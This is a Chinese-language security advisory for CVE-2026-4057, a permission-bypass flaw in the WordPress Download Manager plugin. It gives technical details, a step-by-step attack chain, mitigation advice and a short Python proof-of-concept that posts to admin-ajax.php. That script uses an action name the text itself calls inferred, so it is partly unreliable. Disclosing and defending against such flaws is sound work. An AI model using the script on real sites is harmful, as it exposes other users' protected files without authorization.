CVE-2026-4057 WordPress Download Manager 权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-4057

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Download Manager 插件

漏洞概述

WordPress Download Manager插件在3.3.51及以下版本中存在权限绕过漏洞。由于`makeMediaPublic()`和`makeMediaPrivate()`函数未正确验证文件所有权，仅检查基础编辑权限，导致拥有投稿人及以上权限的认证攻击者可移除他人受保护媒体文件的访问限制，使本应私密的文件通过直接URL公开访问。该漏洞CVSS评分为4.3，属于中危风险。

技术细节

该漏洞的核心逻辑缺陷位于WordPress Download Manager插件的`src/MediaLibrary/MediaAccessControl.php`文件中。具体而言，`makeMediaPublic()`和`makeMediaPrivate()`这两个函数在处理媒体访问权限变更时，存在严重的权限校验疏漏。代码逻辑错误地使用了`edit_posts`这一宽泛的权限检查，而非针对特定ID的`edit_post`所有权检查。这意味着任何拥有“投稿人”及以上角色的用户，只要能登录后台，理论上就通过了该函数的权限验证。更关键的是，代码执行顺序存在设计缺陷，清除保护元数据（如访问密码、IP限制、私有标记）的操作在执行完整的管理员权限校验之前就已经完成。因此，攻击者可以利用这一逻辑漏洞，向目标接口发送恶意请求，强制将管理员上传的受保护文件变为公开状态，导致敏感数据泄露。

攻击链分析

STEP 1

1. 获取权限

攻击者在目标WordPress站点注册账户或利用现有账户，获得Contributor（投稿人）及以上级别的权限。

STEP 2

2. 侦察目标

攻击者浏览站点或通过枚举，发现受保护的媒体文件ID（通常可以通过查看页面源代码或API响应获取）。

STEP 3

3. 构造请求

攻击者获取有效的WordPress Nonce，并构造包含目标媒体ID的POST请求，指向处理`makeMediaPublic`的接口。

STEP 4

4. 执行攻击

发送恶意请求。由于服务器端未校验用户是否拥有该文件，直接执行了移除保护元数据的操作。

STEP 5

5. 访问数据

攻击者直接通过媒体文件的URL访问该资源，成功下载原本受密码或权限保护的文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-4057
# Description: Exploits missing capability check to make private media files public.
# Requirements: Contributor level access or higher.

import requests

def exploit(target_url, wp_cookie, media_id, nonce):
    """
    Attempts to strip protection from a target media file.
    """
    # The endpoint might be admin-ajax.php or a specific REST API endpoint
    # based on the plugin structure. This assumes a standard AJAX action.
    url = f"{target_url}/wp-admin/admin-ajax.php"
    
    headers = {
        "Cookie": wp_cookie,
        "User-Agent": "Mozilla/5.0 (PoC Analyst)"
    }
    
    # Payload derived from the vulnerable function names
    payload = {
        "action": "wpdm_make_media_public", # Inferred action name
        "id": media_id,
        "_wpnonce": nonce
    }
    
    response = requests.post(url, data=payload, headers=headers)
    
    if response.status_code == 200:
        print(f"[+] Request sent successfully for Media ID: {media_id}")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed to send request. Status code: {response.status_code}")

# Example usage
# target = "http://vulnerable-site.com"
# cookie = "wordpress_logged_in_xxx=..."
# target_media_id = 123
# valid_nonce = "..."
# exploit(target, cookie, target_media_id, valid_nonce)

影响范围

WordPress Download Manager <= 3.3.51

防御指南

临时缓解措施

如果不能立即升级插件，建议通过Web服务器配置规则限制对/wp-content/uploads/目录下文件的直接访问，或者暂时禁用插件中的媒体库访问控制功能，直到应用补丁。同时，应加强用户权限管理，确保只有可信用户拥有内容编辑权限。